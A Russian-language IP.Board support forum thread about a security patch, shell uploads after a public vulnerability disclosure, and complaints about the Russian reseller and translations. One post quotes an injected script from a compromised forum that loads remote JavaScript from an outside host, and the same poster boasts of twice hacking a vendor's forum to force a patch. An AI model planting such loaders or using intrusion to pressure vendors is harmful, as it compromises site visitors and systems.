Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Security update

Рекомендованные сообщения

Опубликовано:

еще в папке uploads находилось три файла: 33e34866fa7dd24bc7d0091daae6031f.php, b65840916dc6f0ccc3b41fc9611e7e02.php и f9a859fa33368da398a7eb96773fb836.php

Опубликовано:

А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча )))

За последние 2 года я лично отправлял около 40 репортов об уязвимостях большей или меньшей сложности. Был и код, кладущий сервер "на лопатки", и XSS, и SQL Injection, и много чего еще. Все это молча латалось в очередном обновлении. А в данном случае проблема не в том, какая открылась дыра, и не в том, как отреагировали IPS, а в том, КТО нашел дыру. Этот типичный "фрилансер - специалист по безопасности", которому необходима слава и известность, и потому, только открыв уязвимость, он тут же радостно распихал код своего эксплоита по всем существующим в мире хак-ресурсам, так что ни о каком "тихом" закрытии дыры речь уже не шла.

Hi, my name is Egidio Romano (aka EgiX) and I'm a freelance web application security researcher.

Погуглите эту фразу. Этот человек регулярно кидает сразу в паблик найденные дыры во всех подряд продуктах. Посылайте лучики любви ему.

Опубликовано:

Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??

Опубликовано:
Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??

Потому что им как всегда насмешить на своих клиентов, не? :)

Опубликовано:

Потому что им как всегда насмешить на своих клиентов

Полностью согласен, да они как мне известно и продавать то ее уже не имеют право.

Опубликовано:

У них сейчас другая игрушка, а с IP.Board они просто "додаивают" остатки денег. Переводы давно не обновляют - тупо меняют циферки версии и добавляют пару строк. Паджинатор как перевели неправильно полгода назад - так и не исправили. Компоненты все отстали уже на 1-2 версии от IPS-овских, а галерея так и вообще на 5 минорных и одну мажорную. Форум заброшен и часто вообще не работает. "Русификацию" свою нифига не тестируют. За новостями и патчами не следят. Минимум телодвижений. Да и зачем? Другая игрушка есть, а IPB не удаляется по одной причине - пока дураки деньги просто так будут нести - будут брать. Как нести перенстанут - закроют лавочку.

Опубликовано:

@Ritsuka, А где ж тогда покупать русскоязычную версию???

Опубликовано:

@Семёныч, пока не появится в России нормальный реселлер, покупать русскую версию негде. Увы.

Видимо свои форумы буду конвертировать в Битрикс и LogicBoard (один конвертировал, функциональности меньше, но терпимо, работает). Но..

Первый вариант слишком дорог, не всем пойдет, а также жрет ну очень много ресурсов, малофункционален, но вроде как надежен - все-таки фреймворк от серьезного разработчика. Второй вариант дешев, тоже малофункционален (но поболее нежели у Битрикс), совсем нет шаблонов дизайна, а самому кастомизировать непросто - сложнее нежели для IPB, разработчик - одиночка, форум поддержки нагло окупировали спамеры и бессовестно предлагают свои услуги - как-то все получается несерьезно.

А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.

Опубликовано:

@Ritsuka, А где ж тогда покупать русскоязычную версию???

Берешь eng. Далее можешь перелопатить ее как угодно.

При наличии времени и опыта - конечно.

Опубликовано:

Ritsuka, А где ж тогда покупать русскоязычную версию???

Полный бесплатный русский перевод от Yurri:

http://community.invisionpower.com/files/file/5545-full-russian-suite-for-ipboard-3rd-apps-

Русский перевод от IBR, бесплатно залитый на IPS и обновляемый "энтузиастом" (содержит забавные косяки):

http://community.invisionpower.com/files/file/5437-russian-language-pack-for-ipb-32x-and-higher-proper-translation/

А еще на 19% выполнен бесплатный коллективный перевод скрипта на русский язык:

http://community.invisionpower.com/index.php?app=languages

Можете просто взять любой готовый, или поучаствовать в коллективной работе по переводу.

А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.

Что-то вы все больше становитесь похожим на спам. Ну ок, вы разочаровались в этой жизни, в IPB и вообще - ведь как же так, "за целых 4 года вдруг внезапно моментально запатченная дырка нашлась! никакой уверенности в завтрашнем дне!!!111" - но это еще не дает вам оснований во всех подряд темах и разделах, где люди спрашивают, как им решить проблемы с IP.Board, влезать с предложениями о переходе на другой скрипт. Мало того, что это никак не помогает в решении проблемы и вообще является оффтопом, это еще и раздражает. спам кончил баном. А вы как планируете?

Опубликовано:

Тема плавн оперешла в другое направление. Но я все вспрошу Ritsuka - какой по твоему мнению самый достойный перевод? от Yurri?

Опубликовано:

Что-то вы все больше становитесь похожим на спам

У людей иногда бывает схожесть. Особенно если не вникать в мировоззрение собеседника, и вообще его не слушать (а только себя), но перед этим первым предложить беседовать.

А нудишь как раз сам. Начал нудеть на форуме IBR, продолжил на форуме и блогах IPS - всюду тебя забанили, что "наши", что "не наши".

Когда такие юноши как ты попадали служить в мое подразделение, как раз мне приходилось стоять у изголовья чуть ли не каждую ночь, чтобы не дай Бог кто-нить не обидел.

А теперь можешь и меня забанить.

Опубликовано:
А теперь можешь и меня забанить.

Зачем? Пусть другие администраторы решают.

На IPS я, кстати, не совсем забанен, а в ридонли, и случилось это по 2 эпизодам:

1. Как-то отрепортив очередной критический баг, я, устав в течении 2 недель ждать очередного пачта или хоть какой-то реакции, дважды взломал через него их официальный форум. После этого уже через 2 дня вышел патч, но на меня обиделись.

2. Когда выходил IP.Nexus я активно сопротивлялся тому, чтобы он был закодирован, аппелируя к асбурдности аргумента "так будет безопаснее". И был прав - все платежные гейтвеи в конечном счете все равно оставили с открытым кодом (и где безопасность?), а закодированный код приложения не позволяет эффективно выявлять и исправлять многочисленные ошибки в скриптах - и в конечном итоге получилось, что, когда мои знакомые, или люди тут на форуме просят помочь с нексусом - ничего не остается, кроме как посылать всех в IPS.

А про IBR тут все и так знают - их было, и сейчас есть за что критиковать. Форум тогда каждый день наполнялся сотней спам-постов, а IBR было начхать. Единственной реакцией на все претензии был бан. Ну, зато хоть теперь спама нет. Правда, это не отменяет факта, что им и сейчас на все начхать, посмотрите хотя бы на первые строки кода страниц на их форуме:

<!--Csoul--><script type="text/javascript"><!--
var url = 'http://dosxfgb.servebbs.net';
document.write('<sc' + 'ript language="JavaScript" ' + 
'src="' + url + '/6201/counter.xhtml"></sc' + 
'ript>')
//--></script><!--/Csoul--><!DOCTYPE html>

Как затроянили им форум - так никто и не потрудился почистить.

Я называю "нудением" случаи, когда люди сгущают краски и рассказывают, как им самим плохо, выставляя их личные трудности как недостатки продукта. Вы выше писали, что у вас проблемы с излишне обостренным патриотизмом и с не знанием языков, и что именно это мешает вам продложать пользоваться IP.Board. Ок, вы имеете право на такую проблему. Но стоит ли теперь ходить и рассказывать всем, что "IP.Board умирает, надо искать альтернативы"? Вы что, считаете, что тем, кто осознанно выбрал IP.Board и имеет опыт общения с иностранными сайтами, ваши стоны кажутся актуальными? Тем более что один раз вы уже высказали свое мнение, и никто вам не мешал. Зачем теперь тиражировать ваше абстрактное субъективное по всем другим конкретным темам форума?

Опубликовано:
  • Автор

@GeoLik, и остальные желающие "переехать" на другие платформы, создавайте отдельно тему и обсуждайте там свой переезд, да и вообще можете перенести свое общение на ресурсах поддержки этих движков. Здесь форум поддержки ИПБ а не каких-то ЛБ или битриксов. Ваши сообщения порядком уже начали подноедать, ну прямо второй ойлфорум, тот тоже в каждом сообщение ныл о переезде, а до сих пор сидит на ипб. В этом отношении полностью солидарен с @Ritsuka. На этом флуд в этой теме закончим.

Опубликовано:

Мужики последний вопрос, что у нас находиться в папке cache\tmp\ и можно ли ее очистить? php файлов там нет, но есть от 06.11 - когда меня заразили. Так вроде все проверил, больше нигде нету.

Изменено пользователем GluK

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

• Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.